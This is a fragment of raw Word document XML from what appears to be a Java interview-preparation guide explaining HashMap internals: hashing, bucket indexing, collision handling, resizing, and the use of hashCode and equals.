    <w:p w14:paraId="0DEC78FA"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 Hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22BFEB" w14:textId="3F89560F"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p>
    <w:p w14:paraId="2982790B"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enhances the hashCode with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash spreading function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F1656"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789CE3"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p>
    <w:p w14:paraId="20277A6C"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g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9DE094C" w14:textId="487DA742"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2795471"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d Bucket Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F730118" w14:textId="536D9E76"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1570B533"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 is the length of the array (must be a power of 2 for performance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE42299"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 Bucket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FFC7C"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create new node at index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655DDAB"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occupied</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (collision):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77259A92"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verse linked list or tree at that index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A7CEBE"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key exists (checked via equals()), update value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B34B07"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se, add new node (as next in list or as tree node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71523D0F"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f Needed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5F66B"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et(key) Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB4668"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 hash of the key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8CDF6"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index = (n - 1) &amp; hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37922977"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raverse list or tree at that index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D7E90" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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hash and use equals() to find the correct key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD4D54"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value if key found, else return null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C627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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA25A2"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llision Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E72666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wo keys hash to the same index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE8FB9"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before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C890B" w14:textId="77777777" w:rsidR="009F342F" w:rsidRPr="00CE4B95" w:rsidRDefault="009F342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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each bucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED246DC"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 and after:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F533ED"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used </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>until 8 entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D5C1F1"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ntries in a bucket &gt; 8 and capacity &gt; 64, it converts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for faster lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E3941"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C675273"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zing (Rehashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2C578"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Factor (default loadFactor = 0.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE4F35"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rray is resized to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63616A16"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ntries are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rehashe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oved to new positions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2FB2EC"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFD4E9"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6E366AF"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CE71FC4"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6101F181" w14:textId="73DB55B9"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ndon"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633A580"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hashCode() → hash → index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660E377"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 table[index] as a node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02F60A"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ity" hashes to same index,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 and it's linked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5C51B"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16" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C879718"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CE4B95" w14:paraId="1069E4A5" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BC37FA"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342F" w:rsidRPr="00CE4B95" w14:paraId="7E11EB39" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49753D1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es hash for key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="3588B03B" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1079EEEF"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s correct bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="4B63CF2E" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57DDA684"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key uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="15CA6027" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F10003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d via Linked List or Tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F342F" w:rsidRPr="00CE4B95" w14:paraId="2DA35A34" w14:textId="77777777" w:rsidTr="009F342F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD78319"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s capacity and rehashes entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E2088C" w14:textId="0589FEEF" w:rsidR="009F342F" w:rsidRPr="00CE4B95"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17" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A612A6E"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7" w:name="_Toc197867381"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is hash collision in HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="7CA5B2B2" w14:textId="0635B952" w:rsidR="00127D9B" w:rsidRPr="00CE4B95"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs in a HashMap when </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two different keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> generate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same hash value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and thus, map to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same bucket index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BCAF4" w14:textId="77777777" w:rsidR="00C47440" w:rsidRPr="00CE4B95"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E4B95" w:rsidRDefault="00C3194C" w:rsidP="00C3194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do collisions happen?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19F24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uses hashCode() to determine the bucket index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F6ECA" w14:textId="2946AB8E"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p>
    <w:p w14:paraId="47C44D37"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18" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B2570F"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D03AB87"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50D83F3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12FD434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0998D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0381DA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cebook"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B6C1A" w14:textId="0C5DF585"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lectronic Arts"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101B67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19" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E717C0E"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HashMap handles collisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0FDA7"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earlier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFBDF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s are handled using a linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027A5D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entry is added to the head or tail of the list at that index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C110AC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differentiate between keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D77BE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9912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umber of entries in a bucket exceeds 8, and capacity &gt; 64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F027A82"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72456D51"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Representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F49D7D" w14:textId="78FC33A8" w:rsidR="00DB28F8" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Index</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acebo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lectron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ts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552B1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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00821751"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E4B95" w14:paraId="05407BA1" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19C5361A"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r>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="6356BAB0" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D374A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keys map to the same bucket index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="797C8052" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1144EBD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hashCode() or same computed index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="72EC9C30" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3853C546"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 List (Java 7), Tree (Java 8+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C3194C" w:rsidRPr="00CE4B95" w14:paraId="047B9215" w14:textId="77777777" w:rsidTr="00C3194C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A30E0C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degrade performance to O(n) if not handled efficiently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68132AEA" w14:textId="43A49F39" w:rsidR="00C3194C" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1432761B" w14:textId="77777777" w:rsidR="00C611E7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C611E7" w:rsidP="00C611E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc197867382"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How HashMap calls hashCode and equals method internally?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="229BB3CC" w14:textId="0BF24840" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="0085624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the hashCode() and equals() methods are used internally to organize and retrieve the data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D52E1"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uses hashCode() and equals() internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13715D4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oring an Entry in the Map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F152B7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 key-value pair to a HashMap, it uses the following steps internally to store the entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A313B8F"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7DC6DA27"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put a key-value pair in the HashMap, the first thing that happens is that the HashMap calls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on the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABF803"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computes an integer value (hash code) based on the key’s content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70567004"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 code is then used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where the key-value pair should be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F143CFE"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0674B9B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determines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index in the underlying array) by taking the hash code and applying a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually index = hashCode % number of buckets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47054200"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buckets is typically a power of 2, and the hashCode is then mapped to an index within that range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1CD66"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38F17BE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multiple keys have the same hash code (or hash code maps to the same bucket),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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B091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ase of a collision, the HashMap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starting from Java 8, when the number of elements in the bucket exceeds a certain threshold) to store multiple entries in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508655D"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entry in the linked list (or tree) will contain the key-value pair, and it will be checked for the correct key using the equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25687D"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trieving a Value from the Map:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C267D1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etrieve a value from a HashMap using a key, the process is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B99DAF5"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3871CFA8"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omputed in the same way as when it was inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0138340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6430BBC5"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is used to locate the correct bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA05C7E"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6F09309A"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re is more than one entry in the bucket (due to collisions), the HashMap will traverse the entries (linked list or tree) in the bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A7430"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4: equals() Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668332D"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nce it has found the right bucket, the HashMap compares each entry’s key with the provided ke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368001BE"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true, it means the correct key has been found, and the corresponding value is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF98EF"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search continues in the next entry in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222AEA8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5: If Key is Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637437D9"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match is found in the bucket, the HashMap returns null (indicating that the key is not present in the map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F74D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y hashCode() and equals() are Important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26835E36"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location. A good hash function ensures that keys are evenly distributed across buckets, minimizing collisions and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2174F"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4884F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F21787B" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0217D9A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804D23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C02B62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F129291" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768D98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311E2A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D41F5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671F3A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C1978" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B89C9FC"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016CDF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5E9767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age;  // Simple hash function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871BFE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DC5F4F" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07411160"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64441C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39C481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7D8630D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200C48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1236D68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5CCFCA29"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8B62A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559A9B" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F190DA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6F2D248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DFCBC7"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71995EB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D29E7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62171AB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2B68E1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A3CC3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33DDB90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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F84ED" w14:textId="77777777" w:rsidR="000639B6" w:rsidRPr="00CE4B95" w:rsidRDefault="000639B6" w:rsidP="00856246">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6B53F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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280D25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s "Engineer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03133D5D"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s "Doctor"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425CAC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E07A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CC35AC"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hashCode() and equals() Work in the Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333C528"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
